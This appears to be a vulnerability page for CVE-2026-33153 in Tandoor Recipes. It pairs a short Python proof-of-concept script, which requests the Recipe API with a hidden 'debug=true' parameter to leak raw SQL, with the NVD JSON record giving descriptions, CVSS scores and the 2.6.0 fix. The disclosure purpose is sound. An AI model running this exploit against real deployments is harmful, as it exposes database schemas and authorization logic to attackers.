CVE-2026-33153

import requests # Target URL of the vulnerable Recipe API # Example: http://target.com/api/recipe/ target_url = "http://target.com/api/recipe/" # Headers with a valid low-privilege authentication token # Replace 'YOUR_LOW_PRIV_TOKEN' with an actual session cookie or token headers = { "Authorization": "Bearer YOUR_LOW_PRIV_TOKEN", "Content-Type": "application/json", "User-Agent": "Mozilla/5.0 (Compatible; CVE-2026-33153-Scanner)" } # The hidden debug parameter that triggers the SQL leak params = { "debug": "true" } try: print(f"[+] Sending request to {target_url} with debug parameter...") response = requests.get(target_url, headers=headers, params=params) if response.status_code == 200: print("[+] Request successful! Checking response for SQL queries...") # In a real scenario, the response JSON might contain a 'debug' or 'sql' key, # or the SQL might be appended to the output. print("[+] Response Content:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33153", "sourceIdentifier": "[email protected]", "published": "2026-03-26T19:17:03.313", "lastModified": "2026-03-30T19:16:16.650", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. In versions prior to 2.6.0, the Recipe API endpoint exposes a hidden `?debug=true` query parameter that returns the complete raw SQL query being executed, including all table names, column names, JOIN relationships, WHERE conditions (revealing access control logic), and multi-tenant space IDs. This parameter works even when Django's `DEBUG=False` (production mode) and is accessible to any authenticated user regardless of their privilege level. This allows a low-privilege attacker to map the entire database schema and reverse-engineer the authorization model. Version 2.6.0 patches the issue."}, {"lang": "es", "value": "Tandoor Recipes es una aplicación para gestionar recetas, planificar comidas y crear listas de compras. En versiones anteriores a la 2.6.0, el endpoint de la API de Recetas expone un parámetro de consulta oculto `?debug=true` que devuelve la consulta SQL sin procesar completa que se está ejecutando, incluyendo todos los nombres de tablas, nombres de columnas, relaciones JOIN, condiciones WHERE (revelando la lógica de control de acceso) y los ID de espacio multi-inquilino. Este parámetro funciona incluso cuando `DEBUG=False` de Django (modo de producción) y es accesible para cualquier usuario autenticado independientemente de su nivel de privilegio. Esto permite a un atacante de bajo privilegio mapear todo el esquema de la base de datos y realizar ingeniería inversa del modelo de autorización. La versión 2.6.0 corrige el problema."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:tandoor:recipes:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.6.0", "matchCriteriaId": "6EFEDF7D-1D00-4901-A064-ECC168038F6C"}]}]}], "references": [{"url": "https://github.com/TandoorRecipes/recipes/releases/tag/2.6.0", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/TandoorRecipes/recipes/security/advisories/GHSA-f83r-v3h5-pchf", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}